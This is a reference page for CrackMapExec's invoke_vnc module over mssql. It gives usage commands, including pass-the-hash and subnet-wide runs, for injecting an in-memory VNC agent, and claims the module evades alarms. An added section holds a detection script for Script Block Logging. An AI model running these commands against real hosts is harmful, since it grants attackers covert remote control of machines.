CrackMapExec Invoke_vnc (mssql)


This page contains detailed information about how to use the invoke_vnc CME module while using the mssql protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module injects a VNC agent in memory and initiates a reverse connection, or binds to a specified port. It works by executing the Invoke-VNC.ps1 PowerShell module.

The invoke_vnc module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.
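Because the module runs Invoke-VNC.ps1 in memory, the defender-side check is to look for it in PowerShell Script Block Logging rather than on disk: Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log records the text of every script block that executes, whether or not it ever existed as a file. The following Python script is an added example, not code from this page or from the CrackMapExec project. It scans constructed event records (not captured from any real host) for the Invoke-VNC indicator taken from this page and, as an assumption about how commands issued over the mssql protocol end up running on the server, for cmd.exe or powershell.exe started directly under the sqlservr.exe service process. The parameter names inside the sample script block are placeholders, not the real Invoke-VNC.ps1 signature.

```python
"""Flag in-memory PowerShell activity consistent with the invoke_vnc module.

Two constructed event shapes are checked:
  * PowerShell Script Block Logging records (Event ID 4104): the
    ScriptBlockText field carries the script content even when nothing is
    written to disk, so "doesn't touch the disk" does not mean "not logged".
  * Process-creation records in the shape of Sysmon Event ID 1: a shell or
    PowerShell host spawned straight under the SQL Server service process.
    That this lineage is what the mssql protocol produces is an ASSUMPTION
    made for this example, not something stated on the page.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Indicator taken from the page: the script name / function it exposes.
SCRIPT_INDICATOR = re.compile(r"invoke-vnc", re.IGNORECASE)

# Image names that should not normally be children of sqlservr.exe (assumption).
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "pwsh.exe")

# Constructed sample records; hostnames reuse the page's target.corp domain.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4104, "Computer": "sql01.target.corp",
     "ScriptBlockText": "Get-Service MSSQLSERVER"},
    {"EventID": 4104, "Computer": "sql01.target.corp",
     # Placeholder body; parameter names are invented for the example.
     "ScriptBlockText": "function Invoke-VNC {\n    param($ConType, $Port, $Password)\n}"},
    {"EventID": 1, "Computer": "sql01.target.corp",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe"},
    {"EventID": 1, "Computer": "ws07.target.corp",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

Finding = Tuple[str, str]  # (computer, reason)


def suspicious_script_blocks(events: Iterable[Dict]) -> List[Finding]:
    """Return 4104 records whose script text references Invoke-VNC."""
    hits: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        if SCRIPT_INDICATOR.search(ev.get("ScriptBlockText", "")):
            hits.append((ev["Computer"], "script block references Invoke-VNC"))
    return hits


def suspicious_process_starts(events: Iterable[Dict]) -> List[Finding]:
    """Return process-creation records where a shell is a child of sqlservr.exe."""
    hits: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        if image.endswith(SHELL_IMAGES) and parent.endswith("sqlservr.exe"):
            hits.append((ev["Computer"], f"{image.rsplit(chr(92), 1)[-1]} spawned by sqlservr.exe"))
    return hits


def triage(events: Iterable[Dict]) -> List[Finding]:
    """Combine both checks over one event stream."""
    events = list(events)
    return suspicious_script_blocks(events) + suspicious_process_starts(events)


if __name__ == "__main__":
    for computer, reason in triage(SAMPLE_EVENTS):
        print(f"{computer}: {reason}")
```

Run against the constructed records, the script reports the Invoke-VNC script block and the cmd.exe started under sqlservr.exe on sql01.target.corp, and ignores the ordinary PowerShell start on the workstation. Script Block Logging must be enabled by policy for the 4104 records to exist at all, which is the practical precondition for this check.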

Supported Protocols


  • mssql
  • smb

Module Options


Here is a complete list of invoke_vnc module options:

# cme mssql -M invoke_vnc --options
[*] invoke_vnc module options:

        CONTYPE   Specifies the VNC connection type, choices are: reverse, bind (default: reverse).
        PORT      VNC Port (default: 5900)
        PASSWORD  Specifies the connection password.

The PASSWORD option is required! Make sure to set it when using this module.

Module Usage


This is how to use the invoke_vnc module while using the mssql protocol:

Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M invoke_vnc -o PASSWORD=<password>

Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M invoke_vnc -o PASSWORD=s3cr3t

Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M invoke_vnc -o PASSWORD=s3cr3t

CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:

# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M invoke_vnc -o PASSWORD=s3cr3t

The invoke_vnc module can also be used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t

Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.